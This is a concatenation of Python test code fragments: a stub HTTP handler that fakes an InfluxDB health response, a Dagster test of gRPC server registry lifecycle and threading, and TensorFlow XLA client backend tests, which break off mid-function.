class ServerWithSelfSingedSSL(http.server.SimpleHTTPRequestHandler):
def _set_headers(self):
self.send_response(200)
self.send_header('Content-type', 'application/json')
self.end_headers()
def do_GET(self):
self._set_headers()
response = json.dumps(
dict(name="influxdb", message="ready for queries and writes", status="pass", checks=[], version="2.0.0",
commit="abcdefgh")).encode('utf-8')
self.wfile.write(response)
|
test_grpc_server_registry.py
|
import sys
import threading
import time
from dagster import file_relative_path, pipeline, repository
from dagster.core.host_representation.grpc_server_registry import ProcessGrpcServerRegistry
from dagster.core.host_representation.handle import GrpcServerRepositoryLocationHandle
from dagster.core.host_representation.handle_manager import RepositoryLocationHandleManager
from dagster.core.host_representation.origin import ManagedGrpcPythonEnvRepositoryLocationOrigin
from dagster.core.types.loadable_target_origin import LoadableTargetOrigin
@pipeline
def noop_pipeline():
pass
@repository
def repo():
return [noop_pipeline]
def _can_connect(origin, endpoint):
try:
with GrpcServerRepositoryLocationHandle(
origin=origin,
server_id=endpoint.server_id,
port=endpoint.port,
socket=endpoint.socket,
host=endpoint.host,
watch_server=False,
):
return True
except Exception: # pylint: disable=broad-except
return False
def test_process_server_registry():
origin = ManagedGrpcPythonEnvRepositoryLocationOrigin(
loadable_target_origin=LoadableTargetOrigin(
executable_path=sys.executable,
attribute="repo",
python_file=file_relative_path(__file__, "test_grpc_server_registry.py"),
),
)
with ProcessGrpcServerRegistry(
wait_for_processes_on_exit=True, cleanup_interval=5, heartbeat_interval=10
) as registry:
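        # With these settings the registry presumably hands out a fresh server endpoint roughly
        # every cleanup_interval=5 seconds, while heartbeat_interval=10 bounds how long an
        # orphaned server keeps running once nothing heartbeats to it (see the timed asserts below).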
with RepositoryLocationHandleManager(registry) as handle_manager:
endpoint_one = registry.get_grpc_endpoint(origin)
handle_one = handle_manager.get_handle(origin)
endpoint_two = registry.get_grpc_endpoint(origin)
handle_two = handle_manager.get_handle(origin)
assert endpoint_two == endpoint_one
assert handle_two == handle_one
assert _can_connect(origin, endpoint_one)
assert _can_connect(origin, endpoint_two)
start_time = time.time()
while True:
# Registry should return a new server endpoint after 5 seconds
endpoint_three = registry.get_grpc_endpoint(origin)
if endpoint_three.server_id != endpoint_one.server_id:
# Handle manager now produces a new handle as well
handle_three = handle_manager.get_handle(origin)
assert handle_three != handle_one
break
if time.time() - start_time > 15:
raise Exception("Server ID never changed")
time.sleep(1)
assert _can_connect(origin, endpoint_three)
# Leave handle_manager context, all heartbeats stop
start_time = time.time()
while True:
# Server at endpoint_one should eventually die due to heartbeat failure
if not _can_connect(origin, endpoint_one):
break
if time.time() - start_time > 30:
raise Exception("Old Server never died after process manager released it")
time.sleep(1)
# Make one more fresh process, then leave the context so that it will be cleaned up
while True:
endpoint_four = registry.get_grpc_endpoint(origin)
if endpoint_four.server_id != endpoint_three.server_id:
assert _can_connect(origin, endpoint_four)
break
# Once we leave the ProcessGrpcServerRegistry context, all processes should be cleaned up
# (if wait_for_processes_on_exit was set)
assert not _can_connect(origin, endpoint_three)
assert not _can_connect(origin, endpoint_four)
def _registry_thread(origin, registry, endpoint, event):
if registry.get_grpc_endpoint(origin) == endpoint:
event.set()
def test_registry_multithreading():
origin = ManagedGrpcPythonEnvRepositoryLocationOrigin(
loadable_target_origin=LoadableTargetOrigin(
executable_path=sys.executable,
attribute="repo",
python_file=file_relative_path(__file__, "test_grpc_server_registry.py"),
),
)
with ProcessGrpcServerRegistry(
wait_for_processes_on_exit=True, cleanup_interval=300, heartbeat_interval=600
) as registry:
endpoint = registry.get_grpc_endpoint(origin)
threads = []
success_events = []
for _index in range(5):
event = threading.Event()
thread = threading.Thread(
target=_registry_thread, args=(origin, registry, endpoint, event)
)
threads.append(thread)
success_events.append(event)
thread.start()
for thread in threads:
thread.join()
for event in success_events:
assert event.is_set()
assert _can_connect(origin, endpoint)
    # Leaving the registry context (wait_for_processes_on_exit=True) shuts the server down.
    assert not _can_connect(origin, endpoint)
|
xla_client_test.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Backend-dependent tests for the Python XLA client."""
import functools
import itertools
import re
import threading
import unittest
from absl import flags
from absl import logging
from absl.testing import absltest
from absl.testing import parameterized
import numpy as np
from tensorflow.compiler.xla.python import xla_client
# pylint: disable=g-import-not-at-top
try:
# This import is only used for GPU; the dependency is incompatible with TPU
# so it results in an import error.
from tensorflow.python.framework import test_util
except ImportError:
test_util = None
# pylint: disable=g-import-not-at-top
try:
from tensorflow.compiler.xla.python import custom_call_for_test
except ImportError:
custom_call_for_test = None
bfloat16 = xla_client.bfloat16
ops = xla_client.ops
FLAGS = flags.FLAGS
# We choose to ignore pylint's complaints about complex comprehensions, which we
# use widely for parameterizing tests.
# pylint: disable=g-complex-comprehension
def TestFactory(xla_backend,
cloud_tpu=False,
tfrt_tpu=False,
external_tpu=False):
tests = []
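  # Every test class defined below is appended to `tests`; the factory presumably returns the
  # list so per-backend test modules (CPU, GPU, TPU) can each instantiate the suite.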
if not cloud_tpu:
int_dtypes = [np.int32, np.int64, np.uint32, np.uint64]
# TODO(phawkins): test np.float16, where supported.
float_dtypes = [bfloat16, np.float32, np.float64]
complex_dtypes = [np.complex64, np.complex128]
standard_dtypes = int_dtypes + float_dtypes + complex_dtypes + [np.bool_]
else:
int_dtypes = [np.int32, np.uint32]
float_dtypes = [np.float32]
complex_dtypes = [np.complex64]
standard_dtypes = int_dtypes + float_dtypes + complex_dtypes + [np.bool_]
dlpack_dtypes = int_dtypes + float_dtypes + [np.bool_]
class ComputationTest(parameterized.TestCase):
"""Base class for running an XLA Computation through the local client."""
def setUp(self):
super(ComputationTest, self).setUp()
self.backend = xla_backend()
def _NewComputation(self, name=None):
if name is None:
name = self.id()
return xla_client.XlaBuilder(name)
def _Execute(self, c, arguments):
compiled_c = self.backend.compile(c.build())
return xla_client.execute_with_python_values(
compiled_c, arguments, backend=self.backend)
def _ExecuteAndAssertWith(self, assert_func, c, arguments, expected):
assert expected is not None
results = self._Execute(c, arguments)
self.assertLen(results, len(expected))
for result, e in zip(results, expected):
        # Numpy's comparison methods are a bit too lenient: they treat inputs as
        # "array-like", so a scalar 4 compares equal to [[4]]. To be stricter we
        # assert the shapes as well.
self.assertEqual(np.asanyarray(result).shape, np.asanyarray(e).shape)
assert_func(result, e)
def _ExecuteAndCompareExact(self, c, arguments=(), expected=None):
self._ExecuteAndAssertWith(np.testing.assert_equal, c, arguments,
expected)
def _ExecuteAndCompareClose(self,
c,
arguments=(),
expected=None,
rtol=1e-4,
atol=0):
self._ExecuteAndAssertWith(
functools.partial(np.testing.assert_allclose, rtol=rtol, atol=atol),
c, arguments, expected)
def NumpyArrayF32(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.float32 dtype."""
return np.array(*args, dtype=np.float32, **kwargs)
def NumpyArrayF64(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.float64 dtype."""
return np.array(*args, dtype=np.float64, **kwargs)
def NumpyArrayS32(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.int32 dtype."""
return np.array(*args, dtype=np.int32, **kwargs)
def NumpyArrayBool(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.bool_ dtype."""
return np.array(*args, dtype=np.bool_, **kwargs)
class ComputationPrinting(absltest.TestCase):
def setUp(self):
super(ComputationPrinting, self).setUp()
self.backend = xla_backend()
def ExampleComputation(self):
builder = xla_client.XlaBuilder("acomputation")
p0 = ops.Parameter(builder, 0, xla_client.shape_from_pyval(np.float32(0)))
p1 = ops.Parameter(
builder, 1, xla_client.shape_from_pyval(np.zeros((4,), np.float32)))
x = ops.Mul(p0, p1)
ops.Add(x, x)
return builder.build()
@unittest.skipIf(cloud_tpu, "not implemented")
def testCompiledHloModuleToHloText(self):
computation = self.ExampleComputation()
executable = self.backend.compile(computation)
hlo_modules = executable.hlo_modules()
self.assertLen(hlo_modules, 1)
hlo_text = hlo_modules[0].to_string()
self.assertTrue(hlo_text.startswith("HloModule acomputation"))
self.assertIn("fusion", hlo_text)
@unittest.skipIf(cloud_tpu, "not implemented")
def testCompiledHloModuleAsSerializedProto(self):
computation = self.ExampleComputation()
executable = self.backend.compile(computation)
hlo_modules = executable.hlo_modules()
self.assertLen(hlo_modules, 1)
hlo_text = hlo_modules[0].to_string()
proto = hlo_modules[0].as_serialized_hlo_module_proto()
hlo_module_roundtrip = xla_client.XlaComputation(proto).get_hlo_module()
hlo_text_roundtrip = hlo_module_roundtrip.to_string()
self.assertEqual(hlo_text, hlo_text_roundtrip)
@unittest.skipIf(cloud_tpu, "not implemented")
def testStableComputationSerialization(self):
# Ideally we would test identical computations produced in different
# processes. For now we have this limited smoke test.
computation = self.ExampleComputation()
ref = computation.as_serialized_hlo_module_proto()
for _ in range(10):
self.assertEqual(computation.as_serialized_hlo_module_proto(), ref)
@unittest.skipIf(cloud_tpu, "not implemented")
def testFlopEstimate(self):
computation = self.ExampleComputation()
properties = xla_client._xla.hlo_module_cost_analysis(
self.backend, computation.as_hlo_module())
self.assertEqual(properties["flops"], 8.0)
def testFingerprint(self):
computation = self.ExampleComputation()
executable = self.backend.compile(computation)
fingerprint = executable.fingerprint
if self.backend.platform == "tpu" and not cloud_tpu:
logging.info("fingerprint: %s", fingerprint)
self.assertNotEmpty(fingerprint)
else:
self.assertIsNone(fingerprint)
tests.append(ComputationPrinting)
class ComputationsWithConstantsTest(ComputationTest):
"""Tests focusing on Constant ops."""
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in int_dtypes + float_dtypes)
def testConstantScalarSum(self, dtype):
if dtype == np.int8 and self.backend.platform == "tpu":
self.skipTest("TPU doesn't support int8")
c = self._NewComputation()
ops.Add(ops.Constant(c, dtype(1.11)), ops.Constant(c, dtype(3.14)))
self._ExecuteAndCompareClose(c, expected=[dtype(1.11) + dtype(3.14)])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testConstantVectorMul(self, dtype):
c = self._NewComputation()
ops.Mul(
ops.Constant(c, np.array([2.5, 3.3, -1.2, 0.7], dtype)),
ops.Constant(c, np.array([-1.2, 2, -2, -3], dtype)))
self._ExecuteAndCompareClose(
c, expected=[[-3, 6.6, 2.4, -2.1]], rtol=3e-3)
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testConstantVectorScalarDiv(self, dtype):
c = self._NewComputation()
ops.Div(
ops.Constant(c, np.array([1.5, 2.5, 3.0, -10.8], dtype=dtype)),
ops.Constant(c, dtype(2.0)))
self._ExecuteAndCompareClose(
c, expected=[[0.75, 1.25, 1.5, -5.4]], rtol=2e-3)
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testConstantVectorScalarPow(self, dtype):
c = self._NewComputation()
ops.Pow(
ops.Constant(c, np.array([1.5, 2.5, 3.0], dtype=dtype)),
ops.Constant(c, dtype(2.)))
self._ExecuteAndCompareClose(c, expected=[[2.25, 6.25, 9.]])
def testIota(self):
c = self._NewComputation()
ops.Iota(c, xla_client.PrimitiveType.F32, 10)
self._ExecuteAndCompareExact(
c, expected=[np.arange(10, dtype=np.float32)])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in int_dtypes)
def testBroadcastedIota(self, dtype):
c = self._NewComputation()
shape = xla_client.Shape.array_shape(
xla_client.dtype_to_etype(dtype), (2, 3))
ops.Iota(c, shape, 1)
expected = np.array([[0, 1, 2], [0, 1, 2]], dtype=dtype)
self._ExecuteAndCompareExact(c, expected=[expected])
def testBooleanAnd(self):
c = self._NewComputation()
ops.And(
ops.Constant(c, NumpyArrayBool([True, False, True, False])),
ops.Constant(c, NumpyArrayBool([True, True, False, False])))
self._ExecuteAndCompareExact(c, expected=[[True, False, False, False]])
def testBooleanOr(self):
c = self._NewComputation()
ops.Or(
ops.Constant(c, NumpyArrayBool([True, False, True, False])),
ops.Constant(c, NumpyArrayBool([True, True, False, False])))
self._ExecuteAndCompareExact(c, expected=[[True, True, True, False]])
def testBooleanXor(self):
c = self._NewComputation()
ops.Xor(
ops.Constant(c, NumpyArrayBool([True, False, True, False])),
ops.Constant(c, NumpyArrayBool([True, True, False, False])))
self._ExecuteAndCompareExact(c, expected=[[False, True, True, False]])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testSum2D(self, dtype):
c = self._NewComputation()
ops.Add(
ops.Constant(c, np.array([[1, 2, 3], [4, 5, 6]], dtype=dtype)),
ops.Constant(c, np.array([[1, -1, 1], [-1, 1, -1]], dtype=dtype)))
self._ExecuteAndCompareClose(c, expected=[[[2, 1, 4], [3, 6, 5]]])
def testShiftLeft(self):
c = self._NewComputation()
ops.ShiftLeft(
ops.Constant(c, NumpyArrayS32([3])),
ops.Constant(c, NumpyArrayS32([2])))
self._ExecuteAndCompareClose(c, expected=[[12]])
def testShiftRightArithmetic(self):
c = self._NewComputation()
ops.ShiftRightArithmetic(
ops.Constant(c, NumpyArrayS32([-2])),
ops.Constant(c, NumpyArrayS32([1])))
self._ExecuteAndCompareClose(c, expected=[[-1]])
def testShiftRightLogical(self):
c = self._NewComputation()
ops.ShiftRightLogical(
ops.Constant(c, NumpyArrayS32([-1])),
ops.Constant(c, NumpyArrayS32([1])))
self._ExecuteAndCompareClose(c, expected=[[2**31 - 1]])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testSum2DWith1DBroadcastDim0(self, dtype):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 0 to match the former's shape.
c = self._NewComputation()
ops.Add(
ops.Constant(c,
np.array([[1, 2, 3], [4, 5, 6], [7, 8, 9]],
dtype=dtype)),
ops.Constant(c, np.array([10, 20, 30], dtype=dtype)),
broadcast_dimensions=(0,))
self._ExecuteAndCompareClose(
c, expected=[[[11, 12, 13], [24, 25, 26], [37, 38, 39]]])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testSum2DWith1DBroadcastDim1(self, dtype):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 1 to match the former's shape.
c = self._NewComputation()
ops.Add(
ops.Constant(c,
np.array([[1, 2, 3], [4, 5, 6], [7, 8, 9]],
dtype=dtype)),
ops.Constant(c, np.array([10, 20, 30], dtype=dtype)),
broadcast_dimensions=(1,))
self._ExecuteAndCompareClose(
c, expected=[[[11, 22, 33], [14, 25, 36], [17, 28, 39]]])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testConstantAxpy(self, dtype):
c = self._NewComputation()
ops.Add(
ops.Mul(
ops.Constant(c, dtype(2)),
ops.Constant(c, np.array([2.2, 3.3, 4.4, 5.5], dtype=dtype))),
ops.Constant(c, np.array([100, -100, 200, -200], dtype)))
self._ExecuteAndCompareClose(
c, expected=[[104.4, -93.4, 208.8, -189]], rtol=2e-3)
def testCustomCall(self):
if self.backend.platform != "cpu":
self.skipTest("Test requires cpu platform")
c = self._NewComputation()
for name, fn in custom_call_for_test.cpu_custom_call_targets.items():
xla_client.register_custom_call_target(name, fn, platform="cpu")
ops.CustomCallWithLayout(
c,
b"test_subtract_f32",
operands=[
ops.Constant(c, np.float32(1.25)),
ops.Constant(c, np.float32(0.5))
],
shape_with_layout=xla_client.Shape.array_shape(
np.dtype(np.float32), (), ()),
operand_shapes_with_layout=[
xla_client.Shape.array_shape(np.dtype(np.float32), (), ()),
xla_client.Shape.array_shape(np.dtype(np.float32), (), ()),
])
self._ExecuteAndCompareClose(c, expected=[0.75])
tests.append(ComputationsWithConstantsTest)
class PythonCallbackTest(ComputationTest):
def testPythonCallback(self):
if self.backend.platform != "cpu":
self.skipTest("Test requires cpu platform")
c = self._NewComputation()
f = lambda x, y: (x + y, x - y)
arg0 = np.array([9, 43, -101, 22], dtype=np.int32)
arg1 = np.array([10, 15, -2, 7], dtype=np.int32)
shape = xla_client.shape_from_pyval(arg0)
shape = shape.with_major_to_minor_layout_if_absent()
p0 = ops.Parameter(c, 0, shape)
p1 = ops.Parameter(c, 1, shape)
out, keepalive = self.backend.emit_python_callback(
f, c, [p0, p1], [shape, shape])
self._ExecuteAndCompareExact(
c, arguments=[arg0, arg1], expected=[arg0 + arg1, arg0 - arg1])
del out, keepalive
def testTokens(self):
if self.backend.platform != "cpu":
self.skipTest("Test requires cpu platform")
c = self._NewComputation()
def _Callback(x, y):
assert y is None, y
return None, x + 1
arg0 = np.array([9, 43, -101, 22], dtype=np.int32)
shape = xla_client.shape_from_pyval(arg0)
token_shape = xla_client.Shape.token_shape()
p0 = ops.Parameter(c, 0, shape)
token = ops.CreateToken(c)
out, keepalive = self.backend.emit_python_callback(
_Callback, c, [p0, token], [token_shape, shape])
out = ops.GetTupleElement(out, 1)
self._ExecuteAndCompareExact(c, arguments=[arg0], expected=[arg0 + 1])
del out, keepalive
def testStriding(self):
if self.backend.platform != "cpu":
self.skipTest("Test requires cpu platform")
c = self._NewComputation()
def _Callback(x):
assert x.flags.f_contiguous, x.strides
# Force the output array to have C layout, which will require a
# transpose back to the expected Fortran layout.
return np.ascontiguousarray(x * 2),
arg0 = np.arange(12, dtype=np.int16).reshape(3, 4)
shape_f_layout = xla_client.Shape.array_shape(
arg0.dtype, arg0.shape, layout=(0, 1))
p0 = ops.Parameter(c, 0, xla_client.shape_from_pyval(arg0))
out, keepalive = self.backend.emit_python_callback(
_Callback, c, [p0], [shape_f_layout], [shape_f_layout])
self._ExecuteAndCompareExact(c, arguments=[arg0], expected=[arg0 * 2])
del out, keepalive
tests.append(PythonCallbackTest)
class ComputationFromProtoTest(absltest.TestCase):
"""Test computation execution from HLO proto."""
def setUp(self):
super(ComputationFromProtoTest, self).setUp()
self.backend = xla_backend()
def testExecuteFromProto(self):
# Build the HLO proto
b = xla_client.XlaBuilder("computation")
ops.Add(ops.Constant(b, np.int32(1)), ops.Constant(b, np.int32(2)))
serialized_proto = b.build().as_serialized_hlo_module_proto()
# Load and execute the proto
c = xla_client.XlaComputation(serialized_proto)
ans, = xla_client.execute_with_python_values(
self.backend.compile(c), (), backend=self.backend)
np.testing.assert_equal(ans, np.int32(3))
tests.append(ComputationFromProtoTest)
class ParametersTest(ComputationTest):
"""Tests focusing on Parameter ops and argument-passing."""
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in int_dtypes)
def testScalarTimesVector(self, dtype):
c = self._NewComputation()
arg0 = np.array(3, dtype=dtype)
arg1 = np.array([10, 15, -2, 7], dtype=dtype)
p0 = ops.Parameter(c, 0, xla_client.shape_from_pyval(arg0))
p1 = ops.Parameter(c, 1, xla_client.shape_from_pyval(arg1))
ops.Mul(p0, p1)
self._ExecuteAndCompareExact(
c, arguments=[arg0, arg1], expected=[arg0 * arg1])
# TODO(phawkins): test comparison harness doesn't support bfloat16
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes if dtype != bfloat16)
def testScalarMinusVectorExplicitNumbering(self, dtype):
# Use explicit numbering and pass parameter_num first. Sub is used since
# it's not commutative and can help catch parameter reversal within the
# computation.
c = self._NewComputation()
arg0 = np.array(2.0, dtype=dtype)
arg1 = np.array([-2.3, 3.3, -4.3, 5.3], dtype=dtype)
p1 = ops.Parameter(c, 1, xla_client.shape_from_pyval(arg1))
p0 = ops.Parameter(c, 0, xla_client.shape_from_pyval(arg0))
ops.Sub(p1, p0)
self._ExecuteAndCompareClose(
c, arguments=[arg0, arg1], expected=[arg1 - arg0])
tests.append(ParametersTest)
class BufferTest(ComputationTest):
"""Tests focusing on execution with Buffers."""
def testConstantSum(self):
c = self._NewComputation()
ops.Add(
ops.Constant(c, np.float32(1.11)), ops.Constant(c, np.float32(3.14)))
self._ExecuteAndCompareClose(c, expected=[4.25])
def testOneParameterSum(self):
c = self._NewComputation()
ops.Add(
ops.Parameter(c, 0, xla_client.shape_from_pyval(NumpyArrayF32(0.))),
ops.Constant(c, np.float32(3.14)))
self._ExecuteAndCompareClose(
c, arguments=[NumpyArrayF32(1.11)], expected=[4.25])
def testTwoParameterSum(self):
c = self._NewComputation()
ops.Add(
ops.Parameter(c, 0, xla_client.shape_from_pyval(NumpyArrayF32(0.))),
ops.Parameter(c, 1, xla_client.shape_from_pyval(NumpyArrayF32(0.))))
self._ExecuteAndCompareClose(
c,
arguments=[NumpyArrayF32(1.11),
NumpyArrayF32(3.14)],
expected=[4.25])
@unittest.skipIf(cloud_tpu, "not implemented")
def testCannotCallWithDeletedBuffers(self):
c = self._NewComputation()
ops.Add(
ops.Parameter(c, 0, xla_client.shape_from_pyval(NumpyArrayF32(0.))),
ops.Constant(c, np.float32(3.14)))
arg = NumpyArrayF32(1.11)
compiled_c = self.backend.compile(c.build())
arg_buffer = self.backend.buffer_from_pyval(arg)
arg_buffer.delete()
with self.assertRaises(RuntimeError):
compiled_c.execute([arg_buffer])
def testXlaShape(self):
pyval = np.array([[1., 2.]], np.float32)
local_buffer = self.backend.buffer_from_pyval(pyval)
xla_shape = local_buffer.xla_shape()
self.assertEqual(xla_shape.dimensions(), (1, 2))
self.assertEqual(np.dtype(xla_shape.element_type()), np.dtype(np.float32))
def testXlaShapeIndex(self):
a = xla_client.ShapeIndex((1, 2))
b = xla_client.ShapeIndex((1, 2))
c = xla_client.ShapeIndex((2, 3))
self.assertEqual(a, b)
self.assertNotEqual(b, c)
def testBlockHostUntilReadyWorks(self):
arg = np.array([[1., 2.]], np.float32)
arg_buffer = self.backend.buffer_from_pyval(arg)
arg_buffer.block_host_until_ready()
# This test merely checks that nothing goes awry when we call
# block_host_until_ready(); it's difficult to test anything else.
def testBlockHostUntilReadyRaisesOnDeletedBuffer(self):
arg = np.array([[1., 2.]], np.float32)
buffer = self.backend.buffer_from_pyval(arg)
buffer.delete()
with self.assertRaisesRegex(
RuntimeError,
re.escape(
"BlockHostUntilReady() called on deleted or donated buffer")):
buffer.block_host_until_ready()
def testDeviceArrayBaseSignatures(self):
# When extending `DeviceArrayBase`, the object behaves as a `DeviceArray`
# and thus needs to correctly implement the following methods.
arg = np.array([[1., 2., 3.]], np.float32)
buffer = self.backend.buffer_from_pyval(arg)
if not isinstance(buffer, xla_client.DeviceArrayBase):
raise unittest.SkipTest(
"The objectof type {} do not extend DeviceArrayBase".format(
type(buffer)))
self.assertEqual(buffer.__array_priority__, 100)
self.assertEqual(buffer.shape, (1, 3))
self.assertEqual(buffer.dtype, np.float32)
self.assertEqual(buffer.size, 3)
self.assertEqual(buffer.ndim, 2)
self.assertIs(buffer, buffer.block_until_ready())
buffer.delete()
with self.assertRaises(RuntimeError):
buffer.block_until_ready()
def testOnDeviceSizeInBytes(self):
if not isinstance(self.backend, xla_client.Client):
self.skipTest("TPU Driver doesn't support OnDeviceSizeInBytes.")
arg0 = np.array([])
arg1 = np.array([[0., 1., 2.]], np.float32)
arg2 = np.array([[3., 4., 5.]], bfloat16)
arg0_buffer = self.backend.buffer_from_pyval(arg0)
arg1_buffer = self.backend.buffer_from_pyval(arg1)
arg2_buffer = self.backend.buffer_from_pyval(arg2)
self.assertEqual(arg0_buffer.on_device_size_in_bytes(), 0)
# OnDeviceSizeInBytes varies depending on the platform. Confirm there's
# a reasonable value.
self.assertGreater(arg1_buffer.on_device_size_in_bytes(), 0)
self.assertGreater(arg2_buffer.on_device_size_in_bytes(), 0)
def testLiveBuffers(self):
if not isinstance(self.backend, xla_client.Client):
self.skipTest("TPU Driver doesn't support LiveBuffers().")
self.assertEmpty(self.backend.live_buffers())
arg0 = np.array([])
arg1 = np.array([[0., 1., 2.]], np.float32)
arg2 = np.array([[3., 4., 5.]], bfloat16)
arg0_buffer = self.backend.buffer_from_pyval(arg0)
arg1_buffer = self.backend.buffer_from_pyval(arg1)
arg2_buffer = self.backend.buffer_from_pyval(arg2)
self.assertLen(self.backend.live_buffers(), 3)
self.assertIs(self.backend.live_buffers()[0], arg2_buffer)
self.assertIs(self.backend.live_buffers()[1], arg1_buffer)
self.assertIs(self.backend.live_buffers()[2], arg0_buffer)
self.assertEqual(self.backend.devices()[0].live_buffers(),
self.backend.live_buffers())
arg1_buffer.delete()
self.assertLen(self.backend.live_buffers(), 2)
self.assertIs(self.backend.live_buffers()[0], arg2_buffer)
self.assertIs(self.backend.live_buffers()[1], arg0_buffer)
arg0_buffer.delete()
arg2_buffer.delete()
self.assertEmpty(self.backend.live_buffers())
def testCopyToHost(self):
arg0 = np.array([[1., 2.]], np.float32)
arg1 = np.array([[3., 4.]], np.float32)
arg0_buffer = self.backend.buffer_from_pyval(arg0)
arg1_buffer = self.backend.buffer_from_pyval(arg1)
# Prefetch two buffers using copy_to_host_async, and then retrieve their
# values using to_py.
arg0_buffer.copy_to_host_async()
arg0_buffer.copy_to_host_async() # Duplicate calls don't do anything.
arg1_buffer.copy_to_host_async()
np.testing.assert_equal(arg0, arg0_buffer.to_py())
np.testing.assert_equal(arg1, arg1_buffer.to_py())
# copy_to_host_async does nothing after to_py is called.
arg0_buffer.copy_to_host_async()
np.testing.assert_equal(arg0, arg0_buffer.to_py())
def testDevice(self):
x = np.arange(8, dtype=np.int32)
for device in self.backend.local_devices():
buf = self.backend.buffer_from_pyval(x, device=device)
self.assertEqual(buf.device(), device)
np.testing.assert_equal(x, buf.to_py())
def testStandardTypes(self):
for dtype in standard_dtypes:
if dtype == bfloat16 or dtype == np.complex128:
continue
arr = self.backend.buffer_from_pyval(np.array([0, 1], dtype))
arr = arr.to_py()
self.assertEqual(dtype, type(arr[0]))
def testUnsafeBufferPointer(self):
if not isinstance(self.backend, xla_client.Client):
self.skipTest("TPU Driver doesn't support UnsafeBufferPointer().")
arg0 = np.array([])
arg1 = np.array([[0., 1., 2.]], np.float32)
arg2 = np.array([[3., 4., 5.]], bfloat16)
arg0_buffer = self.backend.buffer_from_pyval(arg0)
arg1_buffer = self.backend.buffer_from_pyval(arg1)
arg2_buffer = self.backend.buffer_from_pyval(arg2)
self.assertGreaterEqual(arg0_buffer.unsafe_buffer_pointer(), 0)
self.assertGreaterEqual(arg1_buffer.unsafe_buffer_pointer(), 0)
self.assertGreaterEqual(arg2_buffer.unsafe_buffer_pointer(), 0)
@unittest.skipIf(cloud_tpu, "not implemented")
def testClone(self):
x = np.array([[3., 4., 5.]], np.float32)
y = self.backend.buffer_from_pyval(x)
z = y.clone()
      self.assertNotEqual(id(y), id(z))
np.testing.assert_array_equal(y.to_py(), z.to_py())
self.assertEqual(y.unsafe_buffer_pointer(), z.unsafe_buffer_pointer())
@unittest.skipIf(cloud_tpu, "not implemented")
def testJaxAttributesHaveCorrectDefaults(self):
x = np.array([[3., 4., 5.]], np.float32)
y = self.backend.buffer_from_pyval(x)
self.assertIsNone(y.aval)
self.assertIsNone(y._device)
tests.append(BufferTest)
class SingleOpTest(ComputationTest):
"""Tests for single ops.
    The goal here is smoke testing: exercise the most basic functionality of
    single XLA ops, adding as few additional ops as possible around the op
    being tested.
"""
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testConcatenate(self, dtype):
c = self._NewComputation()
args = (
ops.Constant(c, np.array([1.0, 2.0, 3.0], dtype=dtype)),
ops.Constant(c, np.array([4.0, 5.0, 6.0], dtype=dtype)),
)
ops.ConcatInDim(c, args, dimension=0)
self._ExecuteAndCompareExact(
c, expected=[np.array([1.0, 2.0, 3.0, 4.0, 5.0, 6.0], dtype=dtype)])
# pyformat: disable
@parameterized.named_parameters({
"testcase_name": "_{}_{}".format(src_dtype.__name__,
dst_dtype.__name__),
"src_dtype": src_dtype,
"dst_dtype": dst_dtype,
} for src_dtype, dst_dtype in itertools.permutations(
[np.bool_, np.int32, np.int64, np.float32, np.float64], 2))
# pyformat: enable
def testConvertElementType(self, src_dtype, dst_dtype):
if ((src_dtype in [np.int64, np.float64] or
dst_dtype in [np.int64, np.float64]) and
self.backend.platform == "tpu"):
self.skipTest("TPU doesn't support float64")
c = self._NewComputation()
x = np.array([0, 1, 0, 0, 1], dtype=src_dtype)
ops.ConvertElementType(
ops.Constant(c, x), xla_client.dtype_to_etype(dst_dtype))
result = xla_client.execute_with_python_values(
self.backend.compile(c.build()), (), backend=self.backend)
self.assertLen(result, 1)
expected = np.array(x, dtype=dst_dtype)
self.assertEqual(result[0].shape, expected.shape)
self.assertEqual(result[0].dtype, expected.dtype)
np.testing.assert_equal(result[0], expected)
# pyformat: disable
@parameterized.named_parameters(
{
"testcase_name": "_{}_{}".format(src_dtype.__name__,
dst_dtype.__name__),
"src_dtype": src_dtype,
"dst_dtype": dst_dtype,
}
for dtypes in [[np.int32, np.float32], [np.int64, np.float64]]
for src_dtype, dst_dtype in itertools.permutations(dtypes, 2))
# pyformat: enable
def testBitcastConvertType(self, src_dtype, dst_dtype):
if (np.float64 in (src_dtype, dst_dtype) and
self.backend.platform == "tpu"):
self.skipTest("TPU doesn't support float64")
c = self._NewComputation()
x = np.array([0, 1, 0, 0, 1], dtype=src_dtype)
ops.BitcastConvertType(
